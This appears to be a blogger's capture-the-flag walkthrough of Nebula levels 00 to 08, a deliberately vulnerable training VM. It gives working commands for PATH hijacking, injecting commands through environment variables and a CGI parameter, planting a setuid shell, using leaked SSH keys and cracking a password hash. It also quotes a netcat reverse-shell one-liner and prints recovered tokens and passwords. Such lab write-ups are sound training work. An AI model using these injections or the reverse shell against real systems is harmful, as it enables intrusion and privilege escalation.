I’ve been having a go at nebula just for the lulz and it seems like an interesting VM since it has covered a gamut of vulnerabilities ranging from crappy PATH issues to the cool python pickle functions. I thought a write up of this was due even though i seen countless versions online; just for a feeling of satisfaction and for archiving the way I did ( to laugh at myself years later).

NOW if you are like me connecting from to your VM via ssh there is a high probability that you will encounter the following error- “Couldn’t agree on a host key algorithm (available:ecdsa-sha2-nistp256)” or something along those lines Not to worry - do the following to generate a fresh set of ssh keypair- >login to the nebula account..
cd /etc/ssh sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key vi /etc/ssh/sshd_config Uncomment this line (if commented) HostKey /etc/ssh/ssh_host_dsa_key chgrp ssh_keys ssh_host_dsa_key sudo service sshd restart

Now thats out of the way ->

Level00 Pretty straightforward , more probably a warm-up exercise. Asks you to find an executable with setuid bit set for user flag00


find / -perm /u=s -user flag00 2>/dev/null
/bin/…/flag00
/rofs/bin/…/flag00
level00@nebula:~$ /rofs/bin/…/flag00
Congrats, now run getflag to get your flag! flag00@nebula:~$ getflag You have successfully executed getflag on a target account

Level01

This is a straight forward path manipulation trick


So i created a symbolic link
ln -s /bin/getflag /tmp/echo
and changed the path as
PATH=/tmp:$PATH
This essentially puts the first path where the system searches for echo as /tmp and is similar to Windows DLL Hijacking Once you run the flag01 executable you should get the flag.

Level02

Once again it does an echo based on the env variable USER, we could manipulate it by doing something like the below -


USER=‘hi;/bin/sh;’
export USER
This is a lazy man’s way of getting the file to execute a shell, but once again u get a shell running in the context of flag02. Run your getflag for the wins :P

Level03 The flag03 folder shows a bash script and a writable directory which executes anything in the folder before removing it :) What i did was create a bash script called crap in writable.d and a c program which invoked a bash shell with uid gid etc as 996 (You can get the uid of flag03 by doing an cat /etc/passwd). My “crap” file in writeable looked like this cat crap


`#!/bin/sh
gcc -o /home/flag03/flagzuser /tmp/run.c;chmod +s,a+rwx /home/flag03
/flagzuser

Once writeable.sh is run you get an executable with setuid bit set .Run it and execute getflag.

Level04 This is a fun one too, looking at the source code you can see that the program does not read the file called “token” but that’s where our flag is -_- . Symbolic linking time!!


ln -s /home/flag04/token /tmp/crap
Then run
./flag04 /tmp/crap
You should get a token
06508b5e-8909-4f38-b630-fdb148a848a2
Level05 This one actually reflects what might happens when you get a shell during a pentest . A pen tester’s dream would be to use that uber cool remote exploit to 1 shot and get a remote # shell. But most of privilege escalations happen by poking around and finding a misconfiguration or in this case ssh keys :p Doing an ls -al shows an nice juicy directory called .backup

Extracted the tgz file into /tmp/flag05
mkdir -p /tmp/flag05
tar xvzf backup-19072011.tgz -C /tmp/flag05/
went to /tmp/flag05/.ssh and
ssh -i id_rsa flag05@127.0.0.1
You should be able to run getflag ;)

Flag06

The hint on the site says its a legacy unix system challenge do /etc/passwd. Notice that flag06 has an hash in its entry take hash,crack with John the ripper and get flag06 password which is hello ??? getflag ! :)

Flag07 The thttpd conf file shows that it runs an http server on port 7007 If you connect to the index.cgi it shows a ping usage and as per the source code you get to pass a variable to CGI script called Host. I passed ?Host=localhost and got the results back. Tried ?Host=localhost;id but didnt work since you need to encode the ; as %3B (Html encoding -) . Now that i see that the id is for flag07 i passed the following ?Host=localhost%3Bgetflag Which displayed the flag information. You could probably go about it a cooler way by html encoding a command for a reverse shell back to your attacking VM :)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f * ^ Stolen from pentestmonkey’s reverse shell one-liner :P

Make sure you encode the command before sending it accross !

Flag08 I learned something from this flag too -> 0x7f = backspace If you do a tcpdump -qns 0 -A -r capture.pcap or transfer the pcap to wirehsark and view in hex view you will see that there are a couple of 0x7f or . after the backdoor, so essentially the password becomes backd00Rmate. Do a su with flag08 and password as backd00Rmate. You should get your flag

Flag 09-Flag18 in the next part